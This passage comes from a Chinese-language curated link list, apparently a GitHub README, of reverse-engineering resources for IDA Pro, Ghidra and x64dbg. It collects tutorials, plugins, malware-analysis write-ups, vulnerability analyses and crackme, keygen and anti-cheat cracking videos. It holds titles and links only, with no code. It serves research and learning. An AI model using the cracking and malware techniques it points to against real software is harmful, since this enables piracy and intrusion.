- 2019.05 [kienbigmummy] [REVERSING WITH IDA FROM SCRATCH (P13)](https://medium.com/p/adc88403c295)
- 2019.04 [kienbigmummy] [REVERSING WITH IDA FROM SCRATCH (P12)](https://medium.com/p/6b19df3db60e)
- 2019.04 [kienbigmummy] [REVERSING WITH IDA FROM SCRATCH (P11)](https://medium.com/p/34e6214132d6)
- 2019.03 [kienbigmummy] [REVERSING WITH IDA FROM SCRATCH (P10)](https://medium.com/p/f054072cc4cd)
- 2019.03 [kienbigmummy] [REVERSING WITH IDA FROM SCRATCH (P9)](https://medium.com/p/3ead456499d2)
- 2019.03 [kienbigmummy] [REVERSING WITH IDA FROM SCRATCH (P8)](https://medium.com/p/c627c70b5efd)
- 2019.03 [kienbigmummy] [REVERSING WITH IDA FROM SCRATCH (P7)](https://medium.com/p/986cb6c09405)
- 2019.03 [tradahacking] [REVERSING WITH IDA FROM SCRATCH (P6)](https://medium.com/p/ec232b87a091)
- 2019.03 [kienbigmummy] [REVERSING WITH IDA FROM SCRATCH (P5)](https://medium.com/p/f153835b4ffc)
### <a id="e838a1ecdcf3d068547dd0d7b5c446c6"></a>系列文章-IDAPython-让你的生活更美好
#### <a id="7163f7c92c9443e17f3f76cc16c2d796"></a>原文
- 2016.06 [paloaltonetworks] [ Using IDAPython to Make Your Life Easier, Part6](https://unit42.paloaltonetworks.com/unit42-using-idapython-to-make-your-life-easier-part-6/)
- 2016.01 [paloaltonetworks] [ Using IDAPython to Make Your Life Easier, Part5](https://unit42.paloaltonetworks.com/using-idapython-to-make-your-life-easier-part-5/)
- 2016.01 [paloaltonetworks] [ Using IDAPython to Make Your Life Easier, Part4](https://unit42.paloaltonetworks.com/using-idapython-to-make-your-life-easier-part-4/)
- 2016.01 [paloaltonetworks] [ Using IDAPython to Make Your Life Easier, Part3](https://unit42.paloaltonetworks.com/using-idapython-to-make-your-life-easier-part-3/)
- 2015.12 [paloaltonetworks] [ Using IDAPython to Make Your Life Easier, Part2](https://unit42.paloaltonetworks.com/using-idapython-to-make-your-life-easier-part-2/)
- 2015.12 [paloaltonetworks] [ Using IDAPython to Make Your Life Easier, Part1](https://unit42.paloaltonetworks.com/using-idapython-to-make-your-life-easier-part-1/)
#### <a id="fc62c644a450f3e977af313edd5ab124"></a>译文
- 2016.01 [freebuf] [IDAPython:让你的生活更美好(五)](http://www.freebuf.com/articles/system/93440.html)
- 2016.01 [freebuf] [IDAPython:让你的生活更美好(四)](http://www.freebuf.com/articles/system/92505.html)
- 2016.01 [freebuf] [IDAPython:让你的生活更美好(三)](http://www.freebuf.com/articles/system/92488.html)
- 2016.01 [freebuf] [IDAPython:让你的生活更美好(二)](http://www.freebuf.com/sectool/92168.html)
- 2016.01 [freebuf] [IDAPython:让你的生活更美好(一)](http://www.freebuf.com/sectool/92107.html)
### <a id="8433dd5df40aaf302b179b1fda1d2863"></a>系列文章-使用IDA逆向C代码
- 2019.01 [ly0n] [Reversing C code with IDA part V](https://paumunoz.tech/2019/01/12/reversing-c-code-with-ida-part-v/)
- 2019.01 [ly0n] [Reversing C code with IDA part IV](https://paumunoz.tech/2019/01/07/reversing-c-code-with-ida-part-iv/)
- 2019.01 [ly0n] [Reversing C code with IDA part III](https://paumunoz.tech/2019/01/02/reversing-c-code-with-ida-part-iii/)
- 2018.12 [ly0n] [Reversing C code with IDA part II](https://paumunoz.tech/2018/12/31/reversing-c-code-with-ida-part-ii/)
- 2018.01 [ly0n] [Reversing C code with IDA part I](https://paumunoz.tech/2018/01/11/reversing-c-code-with-ida-part-i/)
### <a id="3d3bc775abd7f254ff9ff90d669017c9"></a>工具&&插件&&脚本介绍
#### <a id="cd66794473ea90aa6241af01718c3a7d"></a>未分类
- 2019.10 [vmray] [VMRay IDA Plugin v1.1: Streamlining Deep-Dive Malware Analysis](https://www.vmray.com/cyber-security-blog/vmray-ida-plugin-v1-1-streamlining-deep-dive-malware-analysis/)
- 2019.10 [talosintelligence] [New IDA Pro plugin provides TileGX support](https://blog.talosintelligence.com/2019/10/new-ida-pro-plugin-provides-tilegx.html)
- 2019.09 [talosintelligence] [GhIDA: Ghidra decompiler for IDA Pro](https://blog.talosintelligence.com/2019/09/ghida.html)
- 2019.05 [carbonblack] [fn_fuzzy: Fast Multiple Binary Diffing Triage with IDA](https://www.carbonblack.com/2019/05/09/fn_fuzzy-fast-multiple-binary-diffing-triage-with-ida/)
- 2019.04 [] [climacros – IDA productivity tool](http://0xeb.net/2019/04/climacros-ida-productivity-tool/)
- 2019.04 [] [QScripts – IDA Scripting productivity tool](http://0xeb.net/2019/04/ida-qscripts/)
- 2019.03 [] [Daenerys: IDA Pro and Ghidra interoperability framework](http://0xeb.net/2019/03/daenerys-ida-pro-and-ghidra-interoperability-framework/)
- 2019.03 [freebuf] [Ponce:一键即可实现符号执行(IDA插件)](https://www.freebuf.com/sectool/197708.html)
- 2019.01 [talosintelligence] [Dynamic Data Resolver (DDR) - IDA Plugin](https://blog.talosintelligence.com/2019/01/ddr.html)
- 2018.11 [4hou] [FLARE脚本系列:使用idawasm IDA Pro插件逆向WebAssembly(Wasm)模块](http://www.4hou.com/reverse/13935.html)
- 2018.10 [aliyun] [用idawasm IDA Pro逆向WebAssembly模块](https://xz.aliyun.com/t/2854)
- 2018.10 [fireeye] [FLARE Script Series: Reverse Engineering WebAssembly Modules Using the
idawasm IDA Pro Plugin](https://www.fireeye.com/blog/threat-research/2018/10/reverse-engineering-webassembly-modules-using-the-idawasm-ida-pro-plugin.html)
- 2018.10 [vmray] [Introducing the IDA Plugin for VMRay Analyzer](https://www.vmray.com/cyber-security-blog/ida-plugin-vmray-analyzer/)
- 2018.10 [aliyun] [IDA-minsc在Hex-Rays插件大赛中获得第二名(2)](https://xz.aliyun.com/t/2842)
- 2018.10 [aliyun] [IDA-minsc在Hex-Rays插件大赛中获得第二名(1)](https://xz.aliyun.com/t/2841)
- 2018.10 [aliyun] [通过两个IDAPython插件支持A12 PAC指令和iOS12 kernelcache 重定位](https://xz.aliyun.com/t/2839)
- 2018.09 [ptsecurity] [How we developed the NIOS II processor module for IDA Pro](http://blog.ptsecurity.com/2018/09/how-we-developed-nios-ii-processor.html)
- 2018.09 [talosintelligence] [IDA-minsc Wins Second Place in Hex-Rays Plugins Contest](https://blog.talosintelligence.com/2018/09/ida-minsc.html)
- 2018.09 [cisco] [IDA-minsc Wins Second Place in Hex-Rays Plugins Contest](https://blogs.cisco.com/security/talos/ida-minsc-wins-second-place-in-hex-rays-plugins-contest)
- 2018.09 [msreverseengineering] [Weekend Project: A Custom IDA Loader Module for the Hidden Bee Malware Family](http://www.msreverseengineering.com/blog/2018/9/2/weekend-project-a-custom-ida-loader-module-for-the-hidden-bee-malware-family)
#### <a id="43a4761e949187bf737e378819752c3b"></a>Loader&&Processor
- 2019.03 [360] [为CHIP-8编写IDA processor module](https://www.anquanke.com/post/id/172217/)
- 2018.10 [ptsecurity] [Modernizing IDA Pro: how to make processor module glitches go away](http://blog.ptsecurity.com/2018/10/modernizing-ida-pro-how-to-make.html)
- 2018.08 [360] [Lua程序逆向之为Luac编写IDA Pro处理器模块](https://www.anquanke.com/post/id/153699/)
#### <a id="c7483f3b20296ac68084a8c866230e15"></a>与其他工具交互
- 2018.09 [dustri] [IDAPython vs. r2pipe](https://dustri.org/b/idapython-vs-r2pipe.html)
### <a id="ea11818602eb33e8b165eb18d3710965"></a>翻译-TheIDAProBook
- 2008.10 [pediy] [[翻译]The IDA Pro Book 第六章](https://bbs.pediy.com/thread-75632.htm)
- 2008.10 [pediy] [[翻译](20081030更新)The IDA Pro Book 第12章:使用FLIRT签名识别库](https://bbs.pediy.com/thread-75422.htm)
- 2008.10 [pediy] [[翻译]The IDA Pro Book(第二章)](https://bbs.pediy.com/thread-74943.htm)
- 2008.10 [pediy] [[翻译]The IDA Pro book 第5章---IDA DATA DISPLAY](https://bbs.pediy.com/thread-74838.htm)
- 2008.10 [pediy] [[翻译]The IDA Pro Book(第一章)](https://bbs.pediy.com/thread-74564.htm)
### <a id="ec5f7b9ed06500c537aa25851a3f2d3a"></a>翻译-ReverseEngineeringCodeWithIDAPro
- 2009.01 [pediy] [[原创]Reverse Engineering Code with IDA Pro第七章中文译稿](https://bbs.pediy.com/thread-80580.htm)
- 2008.06 [pediy] [[翻译]Reverse Engineering Code with IDA Pro(第一、二章)](https://bbs.pediy.com/thread-66010.htm)
### <a id="2120fe5420607a363ae87f5d2fed459f"></a>IDA本身
- 2019.01 [pediy] [[原创]IDA7.2安装包分析](https://bbs.pediy.com/thread-248989.htm)
- 2019.01 [pediy] [[原创]IDA 在解析 IA64 中的 brl 指令时存在一个 Bug](https://bbs.pediy.com/thread-248983.htm)
- 2018.11 [hexblog] [IDA 7.2 – The Mac Rundown](http://www.hexblog.com/?p=1300)
- 2018.10 [pediy] [[原创] 修复 IDA Pro 7.0在macOS Mojave崩溃的问题](https://bbs.pediy.com/thread-247334.htm)
### <a id="d8e48eb05d72db3ac1e050d8ebc546e1"></a>逆向实战
#### <a id="374c6336120363a5c9d9a27d7d669bf3"></a>未分类
- 2019.11 [4hou] [反作弊游戏如何破解,看看《黑色沙漠》逆向分析过程:使用 IDAPython 和 FLIRT 签名恢复 IAT](https://www.4hou.com/web/21806.html)
- 2019.11 [aliyun] [使用IDA microcode去除ollvm混淆(下)](https://xz.aliyun.com/t/6795)
- 2019.06 [devco] [破密行動: 以不尋常的角度破解 IDA Pro 偽隨機數](https://devco.re/blog/2019/06/21/operation-crack-hacking-IDA-Pro-installer-PRNG-from-an-unusual-way/)
- 2019.05 [360] [IDAPython实战项目——DES算法识别](https://www.anquanke.com/post/id/177808/)
- 2019.04 [venus] [使用 IDA Pro 的 REobjc 模块逆向 Objective-C 二进制文件](https://paper.seebug.org/887/)
- 2019.01 [ly0n] [Cracking with IDA (redh@wk 2.5 crackme)](https://paumunoz.tech/2019/01/05/cracking-with-ida-redhwk-2-5-crackme/)
- 2018.11 [somersetrecon] [Introduction to IDAPython for Vulnerability Hunting - Part 2](http://www.somersetrecon.com/blog/2018/8/2/idapython-part-2)
- 2018.11 [pediy] [[原创]IDA动态调试ELF](https://bbs.pediy.com/thread-247830.htm)
- 2018.06 [pediy] [[翻译]在IDA中使用Python Z3库来简化函数中的算术运算](https://bbs.pediy.com/thread-228688.htm)
- 2018.03 [duo] [Reversing Objective-C Binaries With the REobjc Module for IDA Pro](https://duo.com/blog/reversing-objective-c-binaries-with-the-reobjc-module-for-ida-pro)
- 2006.05 [pediy] [Themida v1008 驱动程序分析,去除花指令的 IDA 文件](https://bbs.pediy.com/thread-25836.htm)
#### <a id="0b3e1936ad7c4ccc10642e994c653159"></a>恶意代码分析
- 2019.04 [360] [两种姿势批量解密恶意驱动中的上百条字串](https://www.anquanke.com/post/id/175964/)
- 2019.03 [cyber] [使用IDAPython分析Trickbot](https://cyber.wtf/2019/03/22/using-ida-python-to-analyze-trickbot/)
- 2019.01 [OALabs] [Lazy String Decryption Tips With IDA PRO and Shade Ransomware Unpacked!](https://www.youtube.com/watch?v=RfnuMhosxuQ)
- 2018.09 [4hou] [Hidden Bee恶意软件家族的定制IDA装载模块开发](http://www.4hou.com/technology/13438.html)
- 2018.09 [4hou] [用IDAPython解密Gootkit中的字符串](http://www.4hou.com/technology/13209.html)
- 2018.05 [OALabs] [Unpacking Gootkit Part 2 - Debugging Anti-Analysis Tricks With IDA Pro and x64dbg](https://www.youtube.com/watch?v=QgUlPvEE4aw)
- 2018.04 [OALabs] [Unpacking VB6 Packers With IDA Pro and API Hooks (Re-Upload)](https://www.youtube.com/watch?v=ylWInOcQy2s)
- 2018.03 [OALabs] [Unpacking Gootkit Malware With IDA Pro and X64dbg - Subscriber Request](https://www.youtube.com/watch?v=242Tn0IL2jE)
- 2018.01 [OALabs] [Unpacking Pykspa Malware With Python and IDA Pro - Subscriber Request Part 1](https://www.youtube.com/watch?v=HfSQlC76_s4)
- 2017.11 [OALabs] [Unpacking Process Injection Malware With IDA PRO (Part 2)](https://www.youtube.com/watch?v=kdNQhfgoQoU)
- 2017.11 [OALabs] [Unpacking Process Injection Malware With IDA PRO (Part 1)](https://www.youtube.com/watch?v=ScBB-Hi7NxQ)
- 2017.06 [hackers] [Reverse Engineering Malware, Part 3: IDA Pro Introduction](https://www.hackers-arise.com/single-post/2017/06/22/Reverse-Engineering-Malware-Part-3-IDA-Pro-Introduction)
- 2017.05 [4hou] [逆向分析——使用IDA动态调试WanaCrypt0r中的tasksche.exe](http://www.4hou.com/technology/4832.html)
- 2017.05 [3gstudent] [逆向分析——使用IDA动态调试WanaCrypt0r中的tasksche.exe](https://3gstudent.github.io/3gstudent.github.io/%E9%80%86%E5%90%91%E5%88%86%E6%9E%90-%E4%BD%BF%E7%94%A8IDA%E5%8A%A8%E6%80%81%E8%B0%83%E8%AF%95WanaCrypt0r%E4%B8%AD%E7%9A%84tasksche.exe/)
- 2012.06 [trustwave] [使用IDAPython对Flame的字符串进行反混淆](https://www.trustwave.com/Resources/SpiderLabs-Blog/Defeating-Flame-String-Obfuscation-with-IDAPython/)
#### <a id="03465020d4140590326ae12c9601ecfd"></a>漏洞分析&&挖掘
- 2018.07 [360] [如何使用 IDAPython 寻找漏洞](https://www.anquanke.com/post/id/151898/)
- 2018.07 [somersetrecon] [如何使用IDAPython挖掘漏洞](http://www.somersetrecon.com/blog/2018/7/6/introduction-to-idapython-for-vulnerability-hunting)
### <a id="e9ce398c2c43170e69c95fe9ad8d22fc"></a>Microcode
- 2019.10 [amossys] [探秘Hex-Rays microcode](https://blog.amossys.fr/stage-2019-hexraysmicrocode.html)
### <a id="9c0ec56f402a2b9938417f6ecbaeaa72"></a>IDA对抗
- 2019.05 [aliyun] [混淆IDA F5的一个小技巧-x86](https://xz.aliyun.com/t/5062)
# <a id="319821036a3319d3ade5805f384d3165"></a>Ghidra
***
## <a id="fa45b20f6f043af1549b92f7c46c9719"></a>插件&&脚本
### <a id="2ae406afda6602c8f02d73678b2ff040"></a>Ghidra
- [**18649**星][10d] [Java] [nationalsecurityagency/ghidra](https://github.com/nationalsecurityagency/ghidra) 软件逆向框架
### <a id="ce70b8d45be0a3d29705763564623aca"></a>新添加的
- [**455**星][9m] [YARA] [ghidraninja/ghidra_scripts](https://github.com/ghidraninja/ghidra_scripts) Ghidra脚本
- [binwalk](https://github.com/ghidraninja/ghidra_scripts/blob/master/binwalk.py) 对当前程序运行BinWalk, 标注找到的内容
- [yara](https://github.com/ghidraninja/ghidra_scripts/blob/master/yara.py) 使用Yara查找加密常量
- [swift_demangler](https://github.com/ghidraninja/ghidra_scripts/blob/master/swift_demangler.py) 自动demangle Swift函数名
- [golang_renamer](https://github.com/ghidraninja/ghidra_scripts/blob/master/golang_renamer.py) 恢复stripped Go二进制文件的函数名
- [**204**星][8m] [Java] [rolfrolles/ghidrapal](https://github.com/rolfrolles/ghidrapal) Ghidra 程序分析库(无文档)
### <a id="69dc4207618a2977fe8cd919e7903fa5"></a>特定分析目标
#### <a id="da5d2b05da13f8e65aa26d6a1c95a8d0"></a>未分类
#### <a id="058bb9893323f337ad1773725d61f689"></a>Loader&&Processor
#### <a id="51a2c42c6d339be24badf52acb995455"></a>Xbox
### <a id="99e3b02da53f1dbe59e0e277ef894687"></a>与其他工具交互
#### <a id="5923db547e1f04f708272543021701d2"></a>未分类
#### <a id="e1cc732d1388084530b066c26e24887b"></a>Radare2
#### <a id="d832a81018c188bf585fcefa3ae23062"></a>IDA
- [**299**星][4m] [Py] [cisco-talos/ghida](https://github.com/cisco-talos/ghida) 在IDA中集成Ghidra反编译器
- 重复区段: [IDA->插件->导入导出->Ghidra](#c7066b0c388cd447e980bf0eb38f39ab) |
- [**238**星][9m] [Py] [daenerys-sre/source](https://github.com/daenerys-sre/source) 使IDA和Ghidra脚本通用, 无需修改
- 重复区段: [IDA->插件->导入导出->Ghidra](#c7066b0c388cd447e980bf0eb38f39ab) |
#### <a id="60e86981b2c98f727587e7de927e0519"></a>DBI
#### <a id="e81053b03a859e8ac72f7fe79e80341a"></a>调试器
### <a id="cccbd06c6b9b03152d07a4072152ae27"></a>外观&&主题
### <a id="45910c8ea12447df9cdde2bea425f23f"></a>脚本编写
#### <a id="c12ccb8e11ba94184f8f24767eb64212"></a>其他
#### <a id="b24e162720cffd2d2456488571c1a136"></a>编程语言
***
## <a id="273df546f1145fbed92bb554a327b87a"></a>文章&&视频
### <a id="8962bde3fbfb1d1130879684bdf3eed0"></a>新添加的1
- 2019.12 [shogunlab] [Here Be Dragons: Reverse Engineering with Ghidra - Part 1 [Data, Functions & Scripts]](https://www.shogunlab.com/blog/2019/12/22/here-be-dragons-ghidra-1.html)
- 2019.11 [freebuf] [使用Ghidra分析phpStudy后门](https://www.freebuf.com/sectool/217560.html)
- 2019.10 [4hou] [使用 Ghidra 分析 phpStudy 后门](https://www.4hou.com/technology/21097.html)
- 2019.10 [knownsec] [使用 Ghidra 分析 phpStudy 后门](https://blog.knownsec.com/2019/10/%e4%bd%bf%e7%94%a8-ghidra-%e5%88%86%e6%9e%90-phpstudy-%e5%90%8e%e9%97%a8/)
- 2019.10 [venus] [使用 Ghidra 分析 phpStudy 后门](https://paper.seebug.org/1058/)
- 2019.10 [WarrantyVoider] [C64LoaderWV - Loading C64 programs into Ghidra](https://www.youtube.com/watch?v=thl6VciaUzg)
- 2019.08 [pentestpartners] [CVE-2019-12103 – Analysis of a Pre-Auth RCE on the TP-Link M7350, with Ghidra!](https://www.pentestpartners.com/security-blog/cve-2019-12103-analysis-of-a-pre-auth-rce-on-the-tp-link-m7350-with-ghidra/)
- 2019.08 [xpnsec] [Analysing RPC With Ghidra and Neo4j](https://blog.xpnsec.com/analysing-rpc-with-ghidra-neo4j/)
- 2019.04 [X0x6d696368] [ghidra_scripts: GoogleSearch.py (to lookup function names via Google)](https://www.youtube.com/watch?v=BMmNg35Cjqo)
- 2019.04 [X0x6d696368] [ghidra_scripts: SimpleStackStrings.py (to reassemble "stack strings")](https://www.youtube.com/watch?v=K_2khlMATew)
- 2019.04 [X0x6d696368] [ghidra_scripts: colorCallGraphCallsTo.py (using SetBackroundColor and traversing the call graph)](https://www.youtube.com/watch?v=SHNO1ZrIQB8)
- 2019.04 [4hou] [利用GHIDRA逆向Tytera MD380的固件](https://www.4hou.com/reverse/17464.html)
- 2019.04 [jeanmichel] [First steps with Ghidra: crackme01](https://medium.com/p/319827a2e80b)
- 2019.03 [GynvaelEN] [Hacking Livestream #74: Ghidra](https://www.youtube.com/watch?v=tXxiuHzjm34)
- 2019.01 [sans] [How to Train Your Dragon: Ghidra Basics](https://www.sans.org/cyber-security-summit/archives/file/summit_archive_1574103618.pdf)
### <a id="ce49901b4914f3688ef54585c8f9df1a"></a>新添加的
- 2019.09 [dustri] [Radare2, IDA Pro, and Binary ninja, a metaphoric comparison](https://dustri.org/b/radare2-ida-pro-and-binary-ninja-a-metaphoric-comparison.html)
- 2019.05 [vimeo] [Three Heads are Better Than One: Mastering Ghidra - Alexei Bulazel, Jeremy Blackthorne - INFILTRATE 2019](https://vimeo.com/335158460)
- 2019.04 [X0x6d696368] [Ghidra: Stack Depth (to detect stack manipulation)](https://www.youtube.com/watch?v=hP9FQrD61tk)
- 2019.04 [X0x6d696368] [Ghidra: Version Tracking](https://www.youtube.com/watch?v=K83T7iVla5s)
- 2019.04 [X0x6d696368] [Ghidra: Export Symbols and Load External Libraries (to resolve imported function names)](https://www.youtube.com/watch?v=Avn8s7iW3Rc)
- 2019.04 [X0x6d696368] [Ghidra: Data Type Manager / Archives and Parse C Source... (resolve function signatures)](https://www.youtube.com/watch?v=u15-r5Erfnw)
- 2019.04 [X0x6d696368] [Ghidra: Generate Checksum... (to extract hashes of embedded malware artifacts)](https://www.youtube.com/watch?v=vLG7c5Eae0s)
- 2019.04 [msreverseengineering] [An Abstract Interpretation-Based Deobfuscation Plugin for Ghidra](https://www.msreverseengineering.com/blog/2019/4/17/an-abstract-interpretation-based-deobfuscation-plugin-for-ghidra)
- 2019.04 [X0x6d696368] [Ghidra: FunctionID (to identify libraries and code reuse)](https://www.youtube.com/watch?v=P8Ul2K7pEfU)
- 2019.04 [X0x6d696368] [Ghidra: Server / Shared Projects (using ghidra-server.org)](https://www.youtube.com/watch?v=ka4vGxLmr4w)
- 2019.04 [X0x6d696368] [Ghidra: Bytes View (to patch binary and export to a working PE file)](https://www.youtube.com/watch?v=utUqAbfURko)
- 2019.04 [X0x6d696368] [Ghidra: Fixing Bugs (Fixing PE section import size alignment)](https://www.youtube.com/watch?v=vpt7-Hn-Uhg)
- 2019.04 [X0x6d696368] [Ghidra: Clear Flow and Repair, and Patch Instruction (to defeat anti-disassembly)](https://www.youtube.com/watch?v=H9DyLQ2iuyE)
- 2019.04 [X0x6d696368] [Ghidra: Scripting (Python) (a quick introduction by implementing pipeDecoder.py)](https://www.youtube.com/watch?v=WLXlq3lvUGs)
- 2019.04 [X0x6d696368] [Ghidra: Decompile and compile (to quickly reimplement malware decoding functions)](https://www.youtube.com/watch?v=YuwOgBDt_b4)
- 2019.04 [X0x6d696368] [Ghidra: EditBytesScript (to fix/manipulate PE header to load ShadowHammer setup.exe sample)](https://www.youtube.com/watch?v=7__tiVMPIEE)
- 2019.04 [X0x6d696368] [Ghidra: Extract and Import ... (to extract resources from PE binaries)](https://www.youtube.com/watch?v=M19ZSTAgubI)
- 2019.04 [X0x6d696368] [Ghidra: YaraGhidraGUIScript (to generate a YARA signature for threat/retro hunting)](https://www.youtube.com/watch?v=tBvxVkJrkh0)
- 2019.04 [X0x6d696368] [Ghidra: XORMemoryScript (to XOR decode strings)](https://www.youtube.com/watch?v=vPqs7E_nhdQ)
- 2019.04 [yoroi] [Ghidra SRE: The AZORult Field Test](https://blog.yoroi.company/research/ghidra-sre-the-azorult-field-test/)
### <a id="b7fb955b670df2babc67e5942297444d"></a>Ghidra漏洞
- 2019.10 [securityaffairs] [Ghidra 9.0.4及之前版本的代码执行漏洞](https://securityaffairs.co/wordpress/92280/hacking/ghidra-code-execution-flaw.html)
- 2019.10 [4hou] [CVE-2019-16941: NSA Ghidra工具RCE漏洞](https://www.4hou.com/info/news/20698.html)
- 2019.03 [venus] [Ghidra 从 XXE 到 RCE](https://paper.seebug.org/861/)
- 2019.03 [tencent] [Ghidra 从 XXE 到 RCE](https://xlab.tencent.com/cn/2019/03/18/ghidra-from-xxe-to-rce/)
### <a id="dd0d49a5e6bd34b372d9bbf4475e8024"></a>实战分析
#### <a id="f0ab053d7a282ab520c3a327fc91ba2e"></a>未分类
- 2019.09 [venus] [使用 Ghidra 对 iOS 应用进行 msgSend 分析](https://paper.seebug.org/1037/)
- 2019.09 [4hou] [使用Ghidra对iOS应用进行msgSend分析](https://www.4hou.com/system/20326.html)
- 2019.09 [WarrantyVoider] [X360 XEX Decompiling With Ghidra](https://www.youtube.com/watch?v=coGz0f7hHTM)
- 2019.08 [WarrantyVoider] [N64 ROM Decompiling With Ghidra - N64LoaderWV](https://www.youtube.com/watch?v=3d3a39LuCwc)
- 2019.08 [4hou] [基于Ghidra和Neo4j的RPC分析技术](https://www.4hou.com/technology/19730.html)
- 2019.04 [X0x6d696368] [Ghidra: Search Program Text... (to find XOR decoding functions in malware)](https://www.youtube.com/watch?v=MaxwIxrmrWY)
- 2019.04 [shogunlab] [Here Be Dragons: Reverse Engineering with Ghidra - Part 0 [Main Windows & CrackMe]](https://www.shogunlab.com/blog/2019/04/12/here-be-dragons-ghidra-0.html)
- 2019.03 [GhidraNinja] [Reverse engineering with #Ghidra: Breaking an embedded firmware encryption scheme](https://www.youtube.com/watch?v=4urMITJKQQs)
- 2019.03 [GhidraNinja] [Ghidra quickstart & tutorial: Solving a simple crackme](https://www.youtube.com/watch?v=fTGTnrgjuGA)
#### <a id="375c75af4fa078633150415eec7c867d"></a>漏洞分析&&挖掘
- 2019.11 [4hou] [使用Ghidra对WhatsApp VOIP Stack 溢出漏洞的补丁对比分析](https://www.4hou.com/vulnerable/21141.html)
- 2019.09 [4hou] [利用Ghidra分析TP-link M7350 4G随身WiFi的RCE漏洞](https://www.4hou.com/vulnerable/20267.html)
- 2019.08 [aliyun] [CVE-2019-12103 使用Ghidra分析TP-Link M7350上的预认证RCE](https://xz.aliyun.com/t/6017)
#### <a id="4e3f53845efe99da287b2cea1bdda97c"></a>恶意代码
- 2019.06 [dawidgolak] [IcedID aka #Bokbot Analysis with Ghidra.](https://medium.com/p/560e3eccb766)
- 2019.04 [aliyun] [利用Ghidra分析恶意软件Emotet](https://xz.aliyun.com/t/4931)
- 2019.04 [X0x6d696368] [Ghidra: Shadow Hammer (Stage 1: Setup.exe) complete static Analysis](https://www.youtube.com/watch?v=gI0nZR4z7_M)
- 2019.04 [X0xd0cf11e] [Analyzing Emotet with Ghidra — Part 2](https://medium.com/p/9efbea374b14)
- 2019.04 [X0x6d696368] [Ghidra: Android APK (it's basically dex2jar with a .dex decompiler)](https://www.youtube.com/watch?v=At_T6riSb9A)
- 2019.04 [X0xd0cf11e] [Analyzing Emotet with Ghidra — Part 1](https://medium.com/p/4da71a5c8d69)
- 2019.03 [GhidraNinja] [Reversing WannaCry Part 1 - Finding the killswitch and unpacking the malware in #Ghidra](https://www.youtube.com/watch?v=Sv8yu12y5zM)
- 2019.03 [HackerSploit] [Malware Analysis With Ghidra - Stuxnet Analysis](https://www.youtube.com/watch?v=TJhfnItRVOA)
- 2019.03 [sans] [Analysing meterpreter payload with Ghidra](https://isc.sans.edu/forums/diary/Analysing+meterpreter+payload+with+Ghidra/24722/)
### <a id="92f60c044ed13b3ffde631794edd2756"></a>其他
### <a id="4bfa6dcf708b3f896870c9d3638c0cde"></a>Tips&&Tricks
### <a id="0d086cf7980f65da8f7112b901fecdc1"></a>工具&&插件&&脚本
- 2019.11 [deadc0de] [使用Python编写Ghidra脚本示例](https://deadc0de.re/articles/ghidra-scripting-python.html)
- 2019.04 [X0x6d696368] [ghidra_scripts: RC4Decryptor.py](https://www.youtube.com/watch?v=kXaHrPyZtGs)
- 2019.04 [aliyun] [如何开发用于漏洞研究的Ghidra插件,Part 1](https://xz.aliyun.com/t/4723)
- 2019.04 [somersetrecon] [Ghidra Plugin Development for Vulnerability Research - Part-1](https://www.somersetrecon.com/blog/2019/ghidra-plugin-development-for-vulnerability-research-part-1)
- 2019.03 [wololo] [PS4 release: GhidraPS4Loader and Playstation 4 Flash tool](http://wololo.net/2019/03/18/ps4-release-ghidraps4loader-and-playstation-4-flash-tool/)
# <a id="b1a6c053e88e86ce01bbd78c54c63a7c"></a>x64dbg
***
## <a id="b4a856db286f9f29b5a32d477d6b3f3a"></a>插件&&脚本
### <a id="353ea40f2346191ecb828210a685f9db"></a>x64dbg
- [**34576**星][1m] [C++] [x64dbg/x64dbg](https://github.com/x64dbg/x64dbg) Windows平台x32/x64调试器
### <a id="da5688c7823802e734c39b539aa39df7"></a>新添加的
- [**1672**星][7m] [C++] [yegord/snowman](https://github.com/yegord/snowman) Snowman反编译器,支持x86, AMD64, ARM。有独立的GUI工具、命令行工具、IDA/Radare2/x64dbg插件,也可以作为库使用
- 重复区段: [IDA->插件->反编译器](#d2166f4dac4eab7fadfe0fd06467fbc9) |
- [IDA插件](https://github.com/yegord/snowman/tree/master/src/ida-plugin)
- [snowman](https://github.com/yegord/snowman/tree/master/src/snowman) QT界面
- [nocode](https://github.com/yegord/snowman/tree/master/src/nocode) 命令行工具
- [nc](https://github.com/yegord/snowman/tree/master/src/nc) 核心代码,可作为库使用
- [**1341**星][1m] [C] [x64dbg/x64dbgpy](https://github.com/x64dbg/x64dbgpy) Automating x64dbg using Python, Snapshots:
- [**972**星][2m] [Py] [x64dbg/docs](https://github.com/x64dbg/docs) x64dbg文档
- [**471**星][13d] [C] [bootleg/ret-sync](https://github.com/bootleg/ret-sync) 在反汇编工具和调试器之间同步调试会话
- 重复区段: [IDA->插件->与调试器同步](#f7d311685152ac005cfce5753c006e4b) |
- [GDB插件](https://github.com/bootleg/ret-sync/tree/master/ext_gdb)
- [Ghidra插件](https://github.com/bootleg/ret-sync/tree/master/ext_ghidra)
- [IDA插件](https://github.com/bootleg/ret-sync/tree/master/ext_ida)
- [LLDB](https://github.com/bootleg/ret-sync/tree/master/ext_lldb)
- [OD](https://github.com/bootleg/ret-sync/tree/master/ext_olly1)
- [OD2](https://github.com/bootleg/ret-sync/tree/master/ext_olly2)
- [WinDgb](https://github.com/bootleg/ret-sync/tree/master/ext_windbg/sync)
- [x64dbg](https://github.com/bootleg/ret-sync/tree/master/ext_x64dbg)
- [**363**星][9m] [fr0gger/awesome-ida-x64-olly-plugin](https://github.com/fr0gger/awesome-ida-x64-olly-plugin) IDA x64DBG OllyDBG 插件收集
- 重复区段: [IDA->插件->收集](#a7dac37cd93b8bb42c7d6aedccb751b3) |
***
## <a id="22894d6f2255dc43d82dd46bdbc20ba1"></a>文章&&视频
- 2019.02 [freebuf] [使用x64dbg分析微信并获取所有联系人信息](https://www.freebuf.com/articles/terminal/195774.html)
- 2018.03 [freebuf] [使用x64dbg分析微信聊天函数并实现发信息](http://www.freebuf.com/sectool/164988.html)
- 2018.03 [360] [使用x64dbg脱壳之开源壳upx](https://www.anquanke.com/post/id/99750/)
- 2018.02 [360] [使用x64dbg分析微信防多开功能](https://www.anquanke.com/post/id/98825/)
- 2018.02 [360] [使用x64dbg 分析 TIM2.0 QQ撤销功能](https://www.anquanke.com/post/id/98498/)
- 2018.02 [KirbiflintCracking] [Patching a Keygenme with x64dbg [Learning Cracking]](https://www.youtube.com/watch?v=tkHW-VNBBQo)
- 2018.01 [KirbiflintCracking] [Cracking & Keygen a crackme with x64dbg [Learning Cracking]](https://www.youtube.com/watch?v=6JsYRg8_yeY)
